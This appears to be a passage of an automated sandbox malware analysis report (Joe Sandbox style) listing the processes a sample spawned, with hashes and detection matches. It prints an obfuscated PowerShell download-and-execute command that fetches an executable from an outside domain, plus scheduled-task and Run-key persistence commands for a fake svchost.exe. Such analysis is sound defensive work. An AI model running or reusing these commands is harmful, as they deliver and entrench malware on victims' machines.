                                                                Imagebase:0xffe90000
                                                                File size:30208 bytes
                                                                MD5 hash:718E86CB060170430D4EF70EE39F93D4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                General

                                                                Start time:19:15:00
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /c ver
                                                                Imagebase:0x4aaa0000
                                                                File size:345088 bytes
                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language

                                                                General

                                                                Start time:19:15:01
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
                                                                Imagebase:0x4aaa0000
                                                                File size:345088 bytes
                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language

                                                                General

                                                                Start time:19:15:01
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
                                                                Imagebase:0x13fa60000
                                                                File size:473600 bytes
                                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET

                                                                General

                                                                Start time:19:15:06
                                                                Start date:04/01/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\ps.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Local\Temp\ps.exe'
                                                                Imagebase:0xe70000
                                                                File size:1163264 bytes
                                                                MD5 hash:128409D5CB9701CD12600BAF7A623794
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000018.00000002.2157884372.0000000002671000.00000004.00000001.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML

                                                                General

                                                                Start time:19:15:10
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
                                                                Imagebase:0x110000
                                                                File size:179712 bytes
                                                                MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language

                                                                General

                                                                Start time:19:15:11
                                                                Start date:04/01/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\ps.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\ps.exe
                                                                Imagebase:0xe70000
                                                                File size:1163264 bytes
                                                                MD5 hash:128409D5CB9701CD12600BAF7A623794
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language

                                                                General

                                                                Start time:19:15:13
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
                                                                Imagebase:0x4a9e0000
                                                                File size:302592 bytes
                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language

                                                                General

                                                                Start time:19:15:13
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\SysWOW64\reg.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
                                                                Imagebase:0x760000
                                                                File size:62464 bytes
                                                                MD5 hash:D69A9ABBB0D795F21995C2F48C1EB560
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language

                                                                General

                                                                Start time:19:15:15
                                                                Start date:04/01/2021
                                                                Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Roaming\svchost.exe'
                                                                Imagebase:0x230000
                                                                File size:1163264 bytes
                                                                MD5 hash:128409D5CB9701CD12600BAF7A623794
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000020.00000002.2179906707.0000000002601000.00000004.00000001.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML

                                                                General

                                                                Start time:19:15:20
                                                                Start date:04/01/2021
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
                                                                Imagebase:0x610000
                                                                File size:179712 bytes
                                                                MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language

                                                                General

                                                                Start time:19:15:21
                                                                Start date:04/01/2021
                                                                Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                Imagebase:0x230000
                                                                File size:1163264 bytes
                                                                MD5 hash:128409D5CB9701CD12600BAF7A623794
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language

                                                                General

                                                                Start time:19:15:22
                                                                Start date:04/01/2021
                                                                Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                Imagebase:0x230000
                                                                File size:1163264 bytes
                                                                MD5 hash:128409D5CB9701CD12600BAF7A623794
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language

                                                                General

                                                                Start time:19:15:25
                                                                Start date:04/01/2021
                                                                Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Roaming\svchost.exe'
                                                                Imagebase:0x230000
                                                                File size:1163264 bytes
                                                                MD5 hash:128409D5CB9701CD12600BAF7A623794
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000027.00000002.2192856956.0000000002661000.00000004.00000001.sdmp, Author: Joe Security

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >